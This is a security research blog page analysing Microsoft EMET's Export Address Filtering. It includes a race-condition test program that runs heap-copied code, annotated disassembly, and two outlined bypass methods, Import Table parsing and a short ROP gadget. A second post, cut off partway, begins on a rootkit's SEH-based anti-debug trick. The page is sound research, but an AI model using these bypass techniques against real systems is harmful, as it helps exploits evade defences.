<span style="font-family: Verdana, sans-serif;">The Windows scheduler allows each thread to run only in a limited slot of time, after which the execution will be passed to other threads. In this way, in most </span><span style="font-family: Verdana, sans-serif;">scenarios, a new thread (including the main one) will run for some time before the execution will eventually yield to the protector thread, that will, then, </span><span style="font-family: Verdana, sans-serif;">activate the EAF protection. But what if this thread runs vulnerable code before the scheduler could allow the execution of the protector one? Is that possible? Well, in theory it is and, a</span><span style="font-family: Verdana, sans-serif;">ctually, this is also how I discovered the race condition in the first place. </span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">I created a little application that accesses the AddressOfFunctions field of the kernel32.dll Export Table from a shellcode loaded outside executable modules (in the </span><span style="font-family: Verdana, sans-serif;">heap), prints it and then quits. I also activated EAF from the EMET tool. My application should have crashed, but instead it worked without any problem and </span><span style="font-family: Verdana, sans-serif;">I couldn't understand why. Moreover, I made my application print the hardware debug registers, and I noticed that the hardware breakpoints were never set. Debugging </span><span style="font-family: Verdana, sans-serif;">EMET.dll I discovered the race condition: so, I added a Sleep() in the entry point of my test application to give the EAF protector thread the time to run, and lo and </span><span style="font-family: Verdana, sans-serif;">behold, my application crashed as expected when the AddressOfFunctions field was read from the malicious shellcode. </span></div>
<div>
<span style="font-family: Verdana, sans-serif;">The same holds if I do an analogous test on new created threads, not just the main one: there is a small window of vulnerability during the beginning of every thread, but </span><span style="font-family: Verdana, sans-serif;">it's very unlikely that an attacker will ever take advantage of it.</span></div>
</div>
<div>
<br /></div>
<div>
<span style="font-family: Verdana, sans-serif;">Here is the source code of my test application:</span></div>
<style type="text/css">
pre.CICodeFormatter{
font-family:arial;
font-size:12px;
border:1px dashed #CCCCCC;
width:99%;
height:auto;
overflow:auto;
background:#f0f0f0;
line-height:20px;
background-image:URL(https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi0RLiAlfLucI_qoHJvHaLwvgXby8Z5TK-aqUneDA06kscMW-ILm4a94iJq4qsFWJQEUtkkWWtnA6woWdwoPT2LE4DB2URdsSOOa3-smdrFFQB1oG2jam0NLQaJYk7Z95MyTJNdoHSDytEn/s320/codebg.gif);
padding:0px;
color:#000000;
text-align:left;
}
pre.CICodeFormatter code{
color:#000000;
word-wrap:normal;
}
</style>
<style type="text/css">
pre.CICodeFormatter{
font-family:arial;
font-size:12px;
border:1px dashed #CCCCCC;
width:99%;
height:auto;
overflow:auto;
background:#f0f0f0;
line-height:20px;
background-image:URL(https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi0RLiAlfLucI_qoHJvHaLwvgXby8Z5TK-aqUneDA06kscMW-ILm4a94iJq4qsFWJQEUtkkWWtnA6woWdwoPT2LE4DB2URdsSOOa3-smdrFFQB1oG2jam0NLQaJYk7Z95MyTJNdoHSDytEn/s320/codebg.gif);
padding:0px;
color:#000000;
text-align:left;
}
pre.CICodeFormatter code{
color:#000000;
word-wrap:normal;
}
</style>
<br />
<pre class="CICodeFormatter"><code class="CICodeFormatter"> #include <Windows.h>
#include <stdio.h>
DWORD getApiAddress(void)
{
DWORD KernelImagebase, *pNames, *pAddresses, pCreateFile;
IMAGE_DOS_HEADER *pMZ;
IMAGE_NT_HEADERS *pPE;
IMAGE_EXPORT_DIRECTORY *pExpDir;
CHAR *currentName;
KernelImagebase = (DWORD)LoadLibrary(L"Kernel32.dll");
pMZ = (IMAGE_DOS_HEADER*)KernelImagebase;
pPE = (IMAGE_NT_HEADERS*)(KernelImagebase + pMZ->e_lfanew);
pExpDir = (IMAGE_EXPORT_DIRECTORY*)(KernelImagebase + pPE->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress);
pNames = (DWORD*)(KernelImagebase + pExpDir->AddressOfNames);
pAddresses = (DWORD*)(KernelImagebase + pExpDir->AddressOfFunctions);
for(int i = 0; i < pExpDir->NumberOfNames; i++)
{
currentName = (CHAR*)(KernelImagebase + pNames[i]);
if(lstrcmpA(currentName, "CreateFileA") == 0)
{
pCreateFile = (DWORD)(KernelImagebase + pAddresses[i]);
}
}
return pCreateFile;
}
void main(void)
{
DWORD apiAddress;
Sleep(2000); // this delay will fix the race condition!
// print the debug registers
CONTEXT myContext;
memset(&myContext, 0, sizeof(myContext));
myContext.ContextFlags = CONTEXT_ALL;
HANDLE hThread = GetCurrentThread();
if(!GetThreadContext(hThread, &myContext)){
printf("cannot get thread context \n");
}
printf("main D0: %08x, D1: %08x, D2: %08x, D3: %08x\n",
myContext.Dr0, myContext.Dr1, myContext.Dr2, myContext.Dr3);
// test1: checking the export table of kernel32.dll from this executable module
apiAddress = getApiAddress();
printf("Test1 CreateFileA function: %08x \n", apiAddress);
// test2: checking the export table ok kernel32.dll from the heap
DWORD functionSize, pMain, pgetApiAddress;
pMain = DWORD(&main);
pgetApiAddress = DWORD(&getApiAddress);
functionSize = pMain - pgetApiAddress;
BYTE *shellcode = (BYTE*)malloc(functionSize);
memcpy(shellcode, (BYTE*)pgetApiAddress, functionSize);
__asm
{
mov ebx, shellcode
call ebx
mov apiAddress, eax
}
free(shellcode);
printf("Test2 CreateFileA function: %08x \n", apiAddress);
getchar();
}
</code></pre>
<br />
<br />
<div>
<span style="font-family: Verdana, sans-serif;">Note: when you compile this code (I used Visual Studio), you must disable all the optimizations to avoid changes to the code layout, and also remove DEP from the linker options.</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">"test1" retrives the address of the CreateFileA API from inside the executable module; "test2" does the same from the heap.</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">If you don't add the Sleep(2000) in the main() function, you will get this output:</span><br />
<br />
<div style="background-color: white; color: #222222;">
<span style="font-family: Courier New, Courier, monospace;">main D0: 00000000, D1: 00000000, D2: 00000000, D3: 00000000</span></div>
<div style="background-color: white; color: #222222;">
<span style="font-family: Courier New, Courier, monospace;">Test1 CreateFileA function: 7649bde6</span></div>
<div style="background-color: white; color: #222222;">
<span style="font-family: Courier New, Courier, monospace;">Test2 CreateFileA function: 7649bde6</span></div>
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">Notice how the debug registers are all set to zero and both tests ran successfully.</span><br />
<span style="font-family: Verdana, sans-serif;">Otherwise if you keep the Sleep(2000) in the code, you will get:</span><br />
<br />
<div style="background-color: white; color: #222222;">
<span style="font-family: Courier New, Courier, monospace;">main D0: 7651fa5c, D1: 77e40204, D2: 00000000, D3: 00000000</span></div>
<div style="background-color: white; color: #222222;">
<span style="font-family: Courier New, Courier, monospace;">Test1 CreateFileA function: 7649bde6</span></div>
<div style="background-color: white; color: #222222; font-size: 13px;">
<br /></div>
<div style="background-color: white; color: #222222; font-size: 13px;">
<div>
<br /></div>
</div>
<span style="background-color: white; color: #222222; font-family: Verdana, sans-serif;">As you can see, the debug registers are set and the EAF protection is active, therefore the application crashes when running the second test:</span><br />
<div>
<span style="background-color: white; color: #222222; font-family: Verdana, sans-serif; font-size: 13px;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg4NSuXbDjqCS4AY1K3JFcKOqoFCkMK-ew_-jfB2p93h66Slt-W1EKlOxhOUFouRX5y_OLIrG6zI3U8LlTTgVcgz4tk-Fe1Ep1udYEg1rbnJHwX7lJxYKVlyD5vdjF1uoqy_P6tOepNtSk/s1600/emeteaf.bmp" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg4NSuXbDjqCS4AY1K3JFcKOqoFCkMK-ew_-jfB2p93h66Slt-W1EKlOxhOUFouRX5y_OLIrG6zI3U8LlTTgVcgz4tk-Fe1Ep1udYEg1rbnJHwX7lJxYKVlyD5vdjF1uoqy_P6tOepNtSk/s1600/emeteaf.bmp" /></a></div>
<div>
<span style="background-color: white; color: #222222; font-family: Verdana, sans-serif; font-size: 13px;"><br /></span></div>
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">I think that a better usage of the synchronization objects may avoid this race condition: for instance, implementing these routines using a critical section and two events would have probably been a safer alternative.</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiQhq2SyoU5yDb4BpbKYUmLrA_Why4OW4B4dVe4lipzkOpOZ05FSV4wQftYjD76Wt6AH0rVrIAW2x7cerV6InzF-KK7oqznqGBKraJz-QgNmyrwm10BH-BQOtCMLZ-phkS_rqVleWTDjsc/s1600/race2.bmp" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiQhq2SyoU5yDb4BpbKYUmLrA_Why4OW4B4dVe4lipzkOpOZ05FSV4wQftYjD76Wt6AH0rVrIAW2x7cerV6InzF-KK7oqznqGBKraJz-QgNmyrwm10BH-BQOtCMLZ-phkS_rqVleWTDjsc/s1600/race2.bmp" /></a></div>
<span style="font-family: Verdana, sans-serif;">In this implementation, the main thread and every additional thread that is created, will add itself to the thread array (processed by the protector thread). The code to do this will be inside a critical section object: in this way, we ensure that if multiple threads are created, only one at the time will run the code to add itself to the threads array. Also, the critical section is a cheap synchronization object compared to the mutex used in the EMET implementation.</span><br />
<span style="font-family: Verdana, sans-serif;">The protector thread is constantly waiting on "event 1", which is an event object: it is thus not wasting CPU cycles looping continuously, like the current EMET implementation does, it will only spawn and use the CPU when a new thread is created. In fact, a new thread will add itself to the threads array, and then will signal "event 1", waking up the protector thread. The new thread will then stop and wait for "event 2". Meanwhile, the protector thread has the time to process the threads array, and because of the structure of the code, it is sure that no other thread will be modifying it. Once EAF is activated, the protector thread signals "event 2" and then goes back to wait for "event 1". The signaled "event 2" will wake up the new thread, which will then continue its normal execution.</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">This implementation has several advantages respect the one from EMET:</span><br />
<br />
<ul>
<li><span style="font-family: Verdana, sans-serif;">The protector thread only uses resources when it has to.</span></li>
<li><span style="font-family: Verdana, sans-serif;">Only one thread at the time modifies the thread array, avoiding the need for an array in the first place: the code could just use a single variable, avoiding an arbitrary size of 256, and also avoids the rare but possible condition of the array filling up before the protector thread spawns.</span></li>
<li><span style="font-family: Verdana, sans-serif;">The new thread is guaranteed to be protected when it reaches the user code, avoiding the small window of vulnerability described in EMET's implementation.</span></li>
</ul>
<span style="font-family: Verdana, sans-serif;">I have not tested this code, but it should work and should not suffer from deadlocks. This could also be implemented in other ways, but you get the point I'm trying to make: you can use proper synchronization to make the code cleaner, more efficient and more elegant.</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">Now let's go back to the second thread: how exactly is EAF implemented? Let's recall that the hardware breakpoints are set by using the CPU debug registers.</span></div>
<div>
<span style="font-family: Verdana, sans-serif;">EMET looks for every entry in the threads list, then successively opens and suspends each thread in order to modify their contexts using the SetThreadContext API.</span></div>
<div>
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEho2Qs0vVNXWVhMnnDW4A87Ru2U6t21vSTkj4j8bA8k_MueefcC2MTc9CKxvDDsufqlJ7tit4QyyaW8SBVbpmb8SkM36nm9QqVzIwGamL0oMI2B5iQvR2K7rpGYZj-63kgJXVY0vkc4nG8/s1600/drx2.bmp" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEho2Qs0vVNXWVhMnnDW4A87Ru2U6t21vSTkj4j8bA8k_MueefcC2MTc9CKxvDDsufqlJ7tit4QyyaW8SBVbpmb8SkM36nm9QqVzIwGamL0oMI2B5iQvR2K7rpGYZj-63kgJXVY0vkc4nG8/s1600/drx2.bmp" /></a></div>
<div>
<div>
<span style="font-family: Verdana, sans-serif;">As you can see from the </span><span style="font-family: Verdana, sans-serif;">image above, the AddressOfFunctions fields of the Export Tables of kernel32.dll and ntdll.dll are used to fill the DR0 and DR1 registers, while some appropriate flags are </span><span style="font-family: Verdana, sans-serif;">set in DR7.</span></div>
<div>
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Verdana, sans-serif;">These flags are:</span></div>
<div>
<ul>
<li><span style="font-family: Verdana, sans-serif;">L0, L1 used to activate the local breakpoints (meaning that they only work in the current thread);</span></li>
<li><span style="font-family: Verdana, sans-serif;">LE used for backward compatibility reasons;</span></li>
<li><span style="font-family: Verdana, sans-serif;">R/W0, R/W1 used to indicate if the breakpoint is set on read, write, or execute operations;</span></li>
<li><span style="font-family: Verdana, sans-serif;">LEN0, LEN1 used to specify the size of the data on which the breakpoint acts.</span></li>
</ul>
</div>
</div>
<div>
<span style="font-family: Verdana, sans-serif;"></span><br />
<div>
<span style="font-family: Verdana, sans-serif;">In short: L0, L1, LE are set to 1 (which means that this flags are enabled); R/W0, R/W1 are set to 11 (which means that a breakpoint is set on data reads or writes); LEN0, LEN1 are set to 11 (referring to 4 bytes long breakpoints).</span><br />
<span style="font-family: Verdana, sans-serif;">When these modifications are done, the thread is resumed and the EAF protection becomes active.</span></div>
<div style="font-family: Verdana, sans-serif;">
<br />
If you are interested in digging into the debug registers and how Windows handles them, I suggest you to read <a href="http://www.alex-ionescu.com/?p=17">this article</a> by Alex Ionescu.<br />
<br /></div>
<div>
<div style="font-family: Verdana, sans-serif;">
At this point we have come so far that our description is almost complete, the only missing piece is the function being installed as an Exception Handler. Let's briefly recall that a function being passed as an Exception Handler must have the following prototype:</div>
<pre style="font-family: Consolas, Courier, monospace; font-size: 14px; line-height: 20px; overflow: auto; padding: 5px; word-wrap: normal;">LONG CALLBACK VectoredHandler(
_In_ PEXCEPTION_POINTERS ExceptionInfo
);
</pre>
<div style="font-family: Verdana, sans-serif;">
<br /></div>
<div style="font-family: Verdana, sans-serif;">
In particular, EMET accesses ExceptionInfo->ExceptionRecord->ExceptionFlags to filter the exception itself, making sure that it's a Single Step one (do remember that when an hardware breakpoint is hit the generated exception is of type Single Step). If it is, EMET disables all the active hardware breakpoints (that is, it sets to zero the L0, L1 flags in DR7). </div>
<div style="font-family: Verdana, sans-serif;">
<br /></div>
<div style="font-family: Verdana, sans-serif;">
Then, it reads the context at the time the exception happened through ExceptionInfo->ContextRecord, and checks the four lowest bits in DR6 (B0 to B3): these bits indicate that a hardware breakpoint condition was met when a Single Step exception was raised (to distinguish it from the ones being generated when the Trap Flag is set).</div>
<div style="font-family: Verdana, sans-serif;">
Although, I'm quite sure that there's a little bug in performing this check:</div>
<div style="font-family: Verdana, sans-serif;">
<br /></div>
<div style="background-color: white;">
<span style="color: magenta; font-family: Courier New, Courier, monospace;">.text:000546C4 test byte ptr [eax+CONTEXT.Dr6], 11h ; bug! 11h should be 3</span></div>
<div style="background-color: white; color: #222222;">
<span style="font-family: Courier New, Courier, monospace;">.text:000546C8 jz short not_handled</span></div>
<div style="background-color: white; color: #222222;">
<span style="font-family: Courier New, Courier, monospace;">.text:000546CA push [eax+CONTEXT._Eip] ; reg_eip</span></div>
<div style="background-color: white; color: #222222;">
<span style="font-family: Courier New, Courier, monospace;">.text:000546D0 call is_in_module</span></div>
<div style="background-color: white; color: #222222;">
<span style="font-family: Courier New, Courier, monospace;">.text:000546D5 test eax, eax</span></div>
<div style="background-color: white; color: #222222;">
<span style="font-family: Courier New, Courier, monospace;">.text:000546D7 jnz short not_handled</span></div>
<div style="background-color: white; color: #222222;">
<span style="font-family: Courier New, Courier, monospace;">.text:000546D9 push edi</span></div>
<div style="background-color: white; color: #222222;">
<span style="font-family: Courier New, Courier, monospace;">.text:000546DA push 1</span></div>
<div style="background-color: white; color: #222222;">
<span style="font-family: Courier New, Courier, monospace;">.text:000546DC call report_protection</span></div>
<div style="background-color: white; color: #222222;">
<span style="font-family: Courier New, Courier, monospace;">.text:000546E1 cmp status_exploitaction, 1</span></div>
<div style="background-color: white; color: #222222;">
<span style="font-family: Courier New, Courier, monospace;">.text:000546E8 pop ecx</span></div>
<div style="background-color: white; color: #222222;">
<span style="font-family: Courier New, Courier, monospace;">.text:000546E9 pop ecx</span></div>
<div style="background-color: white; color: #222222;">
<span style="font-family: Courier New, Courier, monospace;">.text:000546EA jnz short not_handled</span></div>
<div style="background-color: white; color: #222222;">
<span style="font-family: Courier New, Courier, monospace;">.text:000546EC push 1</span></div>
<div style="background-color: white; color: #222222;">
<span style="font-family: Courier New, Courier, monospace;">.text:000546EE push STATUS_STACK_BUFFER_OVERRUN</span></div>
<div style="background-color: white; color: #222222;">
<span style="font-family: Courier New, Courier, monospace;">.text:000546F3 push dword ptr [edi+4]</span></div>
<div style="background-color: white; color: #222222;">
<span style="font-family: Courier New, Courier, monospace;">.text:000546F6 call report_error_and_terminate</span></div>
<div style="background-color: white; color: #222222;">
<span style="font-family: Courier New, Courier, monospace;">.text:000546FB not_handled:</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"> ...</span></div>
<div>
<br />
<br /></div>
</div>
<div>
<span style="font-family: Verdana, sans-serif;">In fact, EMET tests DR6 for 11 hex, which is 10001 in binary, corresponding to the B0 and the undocumented 5th bit that, according to the Intel's manuals, is always </span><span style="font-family: Verdana, sans-serif;">set to 1. I believe that this is a typo, and that the correct flag to be tested was 11 in binary (meaning 3 hex) that is both B0 and B1. </span><br />
<span style="font-family: Verdana, sans-serif;">This is not a serious issue, because DR1 is checked anyway, but it's really useless to let EMET handle a breakpoint that is not actually set. </span><br />
<div>
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Verdana, sans-serif;">If one of the two hardware breakpoints was hit when the exception occurred, which may always be the case because of the buggy TEST instruction, EMET checks the value of the EIP register at that time (through ExceptionInfo-</span><span style="font-family: Verdana, sans-serif;">>ContextRecord->EIP) to verify (using GetModuleHandleEx) if the instruction that caused the Single Step exception belonged to an executable module or not. If it didn't, the error </span><span style="font-family: Verdana, sans-serif;">is logged and if "status_exploitaction" is set (this variable corresponds to the "Stop on exploit/Audit only" customizable option available from the EMET's settings panel) a STATUS_STACK_BUFFER_OVERRUN is reported </span><span style="font-family: Verdana, sans-serif;">(through ExceptionInfo->ExceptionRecord->ExceptionCode), the exception is unhandled and the process is terminated. In all the other cases (that is if neither of the </span><span style="font-family: Verdana, sans-serif;">two bits in DR6 is set, or if the instruction reported in EIP did belong to an executable module, or if "status_exploitaction" isn't set) EMET disables all the bits </span><span style="font-family: Verdana, sans-serif;">in DR6 and activates the L0 and L1 flags in DR7 again to let the execution resume as if nothing happened.</span></div>
<div>
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">Our journey through the EAF implementation is now over, but I would like to discuss briefly a couple of methods to bypass it. As declared by Microsoft, EAF wasn't </span><span style="font-family: Verdana, sans-serif;">meant as a definitive protection against unwanted access to the APIs addresses, but more as an obstacle for existing shellcodes.</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">One simple way to obtain such information, without any need to access the Export Table, is to use the Import Table instead. In particular, you can parse the Import </span><span style="font-family: Verdana, sans-serif;">Table of a DLL that is * importing * the desired API from kernel32.dll, or ntdll.dll and look for the OriginalFirstThunk and FirstThunk fields in the IMAGE_IMPORT_DESCRIPTOR structure. For example, User32.dll is loaded in almost every running process, and it imports both the LoadLibrary and GetProcAddress APIs, which are commonly used in shellcodes to get the addresses of other APIs.</span><br />
<br />
<span style="font-family: Verdana, sans-serif;">Another method to bypass EAF is to use a specially crafted <a href="http://cseweb.ucsd.edu/~hovav/dist/rop.pdf">ROP</a> gadget just to retrieve the AddressOfFunctions value. In this way, since you are reading the Export </span><span style="font-family: Verdana, sans-serif;">Table from a gadget that lies within an executable module, EMET won't detect anything suspicious and you can then find the addresses of all the needed APIs. Of </span><span style="font-family: Verdana, sans-serif;">course, EMET performs some security checks against ROP too, but since we need only one gadget it's not too difficult to find one that exploits the protection itself (or else, you may want to use a <a href="http://www.comp.nus.edu/~liangzk/papers/asiaccs11.pdf">JOP</a> gadget). For example, a shellcode may parse the Export Table of a module in order to find the pointer to the AddressOfFunctions field, put this pointer in the EAX register and then call a code gadget that does the following:</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;">MOV EAX, [EAX]</span><br />
<span style="font-family: Courier New, Courier, monospace;">RET</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;"><br /></span><span style="font-family: Verdana, sans-serif;">This gadget is very short, it only requires three bytes of opcodes (8B 00 C3), so it should be very easy to find it inside most executable modules.</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">These are just two simple ideas that come to my mind, of course they are nothing new and surely you can find other ways to implement the trick. Moreover, these two methods assume that you already got rid of DEP and ASLR, which are the real pain when writing an exploit.</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;"><u>Note</u>: the analysis was originally written in September 2013 for version 4.0, but it still holds for current version 4.1.</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<br />
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
</div>
</div>
giuliahttp://www.blogger.com/profile/12995367052667481710noreply@blogger.com2tag:blogger.com,1999:blog-8573685359056491736.post-8855068274891109882013-06-10T02:32:00.000-07:002013-06-10T02:32:35.203-07:00SEH: Subtle Exception Handling!<span style="font-family: Verdana, sans-serif;">Malwares are a never-ending source of obfuscation tricks: some of them are accurately crafted, whereas others just happen to be there. Sometimes it depends on the compiler itself: how it deals with optimizations, how it translates some language specific constructs, and so on. In this case, we are going to discuss how SEH is implemented in Visual C++. After a short low level explanation, I will propose a procedure that exploits this mechanism in order to obfuscate code and I will provide the source code of a working POC too.</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif; font-size: large;"><u>SEH in Visual Studio: how does it work?</u></span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">Let's begin with a brief description of a little trick that I've found while analyzing a malware detected by ESET as Win32/Rootkit.Avatar</span><span style="font-family: Verdana, sans-serif;">. For more information about it you can check <a href="http://www.welivesecurity.com/2013/05/01/mysterious-avatar-rootkit-with-api-sdk-and-yahoo-groups-for-cc-communication/">this detailed article</a>.</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">In particular, the article mentions a specific behaviour of the malware: "the malware </span><span style="font-family: Verdana, sans-serif;">raises an exception to pass control to an installed exception-handler". That is:</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;">...</span><br />
<span style="font-family: Courier New, Courier, monospace;">.text:0040235B push offset sub_402B26</span><br />
<span style="font-family: Courier New, Courier, monospace;">.text:00402360 mov eax, large fs:0</span><br />
<span style="font-family: Courier New, Courier, monospace;">.text:00402366 push eax</span><br />
<span style="font-family: Courier New, Courier, monospace;">.text:00402367 mov large fs:0, esp</span><br />
<div>
<span style="font-family: Courier New, Courier, monospace;">...</span></div>
<br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">This is the standard way an exception handler is installed, and it corresponds to a try-catch statement in C++.</span><br />
<span style="font-family: Verdana, sans-serif;">Anyway, if we keep analyzing the code we'll notice that this isn't the only exception handler being installed. In fact, we are going to see how the malware takes advantage of another one, in the attempt to hide a common debugger check (the PEB one) inside it.</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">Exception handlers have already been extensively documented in the past, but this one is a little bit trickier because it makes use of a Visual Studio specific implementation: the <a href="http://msdn.microsoft.com/en-us/library/s58ftw19(v=vs.80).aspx">try-except statement</a>. Here is how it is implemented in the malware:</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;">...</span><br />
<span style="font-family: Courier New, Courier, monospace;">.text:00401CC5 push offset dword_4044C8</span><br />
<br />
<span style="font-family: 'Courier New', Courier, monospace;">.text:00401CCA push offset __except_handler3</span><br />
<span style="font-family: Courier New, Courier, monospace;">.text:00401CCF mov eax, large fs:0</span><br />
<span style="font-family: Courier New, Courier, monospace;">.text:00401CD5 push eax</span><br />
<span style="font-family: Courier New, Courier, monospace;">.text:00401CD6 mov large fs:0, esp</span><br />
<span style="font-family: Courier New, Courier, monospace;">...</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">This is the installation code for a SEH in Visual Studio, and there are two substantial differences in respect to the previous code: the first one is that it seems to be installing a standard library routine (</span><span style="font-family: Verdana, sans-serif;">"</span><span style="font-family: 'Courier New', Courier, monospace;">__except_handler3</span><span style="font-family: Verdana, sans-serif;">"</span><span style="font-family: Verdana, sans-serif;">) as an exception handler, which doesn't look suspicious; the second one is a little bit confusing </span><span style="font-family: Verdana, sans-serif;">if you haven't read the specifications before. </span><br />
<span style="font-family: Verdana, sans-serif;">However, a closer look will reveal the trick. In fact another value is being pushed, that is:</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;">.text:00401CC5 push offset dword_4044C8</span><br />
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Verdana, sans-serif;">We usually wouldn't expect to see this additional "push", and we would think that it isn't related to the SEH, but... it actually is!</span></div>
<div>
<span style="font-family: Verdana, sans-serif;">In particular, this "push" is putting on the stack the address of a data structure named "scopetable entry", <a href="http://www.microsoft.com/msj/0197/exception/exception.aspx">documented by Matt Pietrek</a>, which has the following definition:</span></div>
<div>
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div>
<div>
<span style="font-family: Courier New, Courier, monospace;"> typedef struct _SCOPETABLE</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"> {</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"> DWORD previousTryLevel;</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"> DWORD lpfnFilter;</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"> DWORD lpfnHandler;</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"> } SCOPETABLE, *PSCOPETABLE;</span></div>
</div>
<div>
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Verdana, sans-serif;">It specifies the addresses of the code blocks to be executed for the filter expression ("lpfnFilter")</span><span style="font-family: 'Courier New', Courier, monospace;"> </span><span style="font-family: Verdana, sans-serif;">and for the except body </span><span style="font-family: Verdana, sans-serif;">("lpfnHandler")</span><span style="font-family: Verdana, sans-serif;">:</span></div>
<div>
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">__try {</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"> ... code</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">}</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">__except(<span style="color: blue;">filter expression</span>) {</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"> ... <span style="color: purple;">except body</span></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">}</span></div>
<div>
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Verdana, sans-serif;">The library routine "__except_handler3" uses this information first to call the code for the filter expression, which will decide if the exception is handled or not, and then to dispatch execution to the except body (in case it's handled). So, actually, the real </span><span style="font-family: Verdana, sans-serif;">exception handler </span><span style="font-family: Verdana, sans-serif;">installed by the malware is not the library one, but it is the one inside the except body. We can see this structure in the malware:</span></div>
<div>
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.rdata:004044C8 dword_4044C8 dd 0FFFFFFFFh</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.rdata:004044CC dd offset filter</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.rdata:004044D0 dd offset except_body</span></div>
</div>
<div>
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Verdana, sans-serif;">and the related code:</span></div>
<div>
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:00401CFA mov [ecx], al ; <span style="color: purple;"><span style="background-color: white;">trigger</span> exception!</span></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:00401CFC jmp short loc_401D13</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:00401CFE ; ----------------------------------------------</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:00401CFE</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:00401CFE filter:</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:00401CFE mov eax, 1</span></div>
<div>
